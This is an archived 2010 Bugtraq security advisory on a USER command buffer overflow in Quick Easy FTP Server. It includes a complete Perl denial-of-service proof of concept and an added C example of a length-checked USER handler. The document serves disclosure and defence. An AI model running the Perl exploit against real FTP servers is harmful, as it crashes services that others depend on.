Open Source and information security mailing list archives
Date: Wed, 4 Aug 2010 15:22:17 +0800
From: "黄超毅" <huang_chaoyi@...ustech.com.cn>
To: "bugtraq" <bugtraq@...ts2.securityfocus.com>
Cc: "bugtraq" <bugtraq@...urityfocus.com>
Subject: Quick Easy FTP Server USER command Vulnerability

Software: Quick Easy FTP Server <=3.9.1
Vulnerability Published: 2010-07-22
Vulnerability Update Time: 2010-07-25
Vendor: No vendor response
Impact: Low
Bug Description:
Quick Easy FTP Server does not validate the length of the USER command argument.
Sending more than 1600 characters in that argument triggers a denial of service.
PoC:
****************************************************************
#!/usr/bin/perl -w
#DoS Exploit of Quick Easy Ftp Server version <=3.9.1 USER COMMAND Buffer Overflow
#Vulnerability Discoverer & Author : demonalex[at]163[dot]com
use Socket;
$host=shift;
$port=shift || '21';
if(!defined($host)){
die("usage: $0 \$host [\$port]\n");
}
#$payload='A'x1604;
$payload=('A'x1600)."\x3D\x41\x41\x41";         #mov     dword ptr [ebx+4], ebp
$target_ip=inet_aton($host);
$target=sockaddr_in($port, $target_ip);
socket(SOCK, AF_INET, SOCK_STREAM, 6);
connect(SOCK, $target);
undef($content);
recv(SOCK, $content, 100, 0);                   #get ftp banner
send(SOCK, "USER "."$payload\r\n", 0);
printf("send ok!\n");
close(SOCK);
exit(0);
****************************************************************
Credits: This vulnerability was discovered by demonalex@....com
         Pentester/Researcher
         Dark2S Security Team/Venustech.GZ Branch
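
The missing check the advisory describes, seen from the server side, as an added example (not part of the original advisory and not Quick Easy FTP Server's code): a USER handler that bounds both the line and the argument before anything is copied. `MAX_LINE`, `MAX_USER` and the function names are assumptions chosen for illustration; the sample input is constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_LINE 512  /* assumed cap on one control-channel line */
#define MAX_USER 64   /* assumed cap on a user name; RFC 959 sets none */

/* Parse one control-channel line of len bytes (not necessarily NUL-terminated).
 * Returns the FTP reply code; on 331 the name has been copied into user. */
int handle_user(const char *line, size_t len, char user[MAX_USER + 1])
{
    user[0] = '\0';
    if (len > MAX_LINE)
        return 500;                    /* overlong line rejected before parsing */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                         /* strip the CRLF terminator */
    if (len < 5 || line[4] != ' ')
        return 500;                    /* not "USER <name>" */
    for (size_t i = 0; i < 4; i++)
        if (toupper((unsigned char)line[i]) != "USER"[i])
            return 500;
    size_t arg_len = len - 5;
    if (arg_len == 0 || arg_len > MAX_USER)
        return 501;                    /* length is checked before any copy */
    for (size_t i = 0; i < arg_len; i++)
        if (!isprint((unsigned char)line[5 + i]))
            return 501;                /* control bytes are not a valid name */
    memcpy(user, line + 5, arg_len);
    user[arg_len] = '\0';
    return 331;                        /* user name okay, need password */
}

/* Constructed input: a USER line whose argument is n 'A' characters. */
int reply_for_name_length(size_t n)
{
    static char buf[5 + 2048 + 2];
    char user[MAX_USER + 1];
    if (n > 2048)
        n = 2048;
    memcpy(buf, "USER ", 5);
    memset(buf + 5, 'A', n);
    memcpy(buf + 5 + n, "\r\n", 2);
    return handle_user(buf, 5 + n + 2, user);
}

int main(void)
{
    printf("64 -> %d, 65 -> %d, 1604 -> %d\n", reply_for_name_length(64),
           reply_for_name_length(65), reply_for_name_length(1604));
    return 0;
}
```

An argument of the size named in the advisory is refused with a 500 reply at the line-length check, before the USER argument is parsed or copied.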
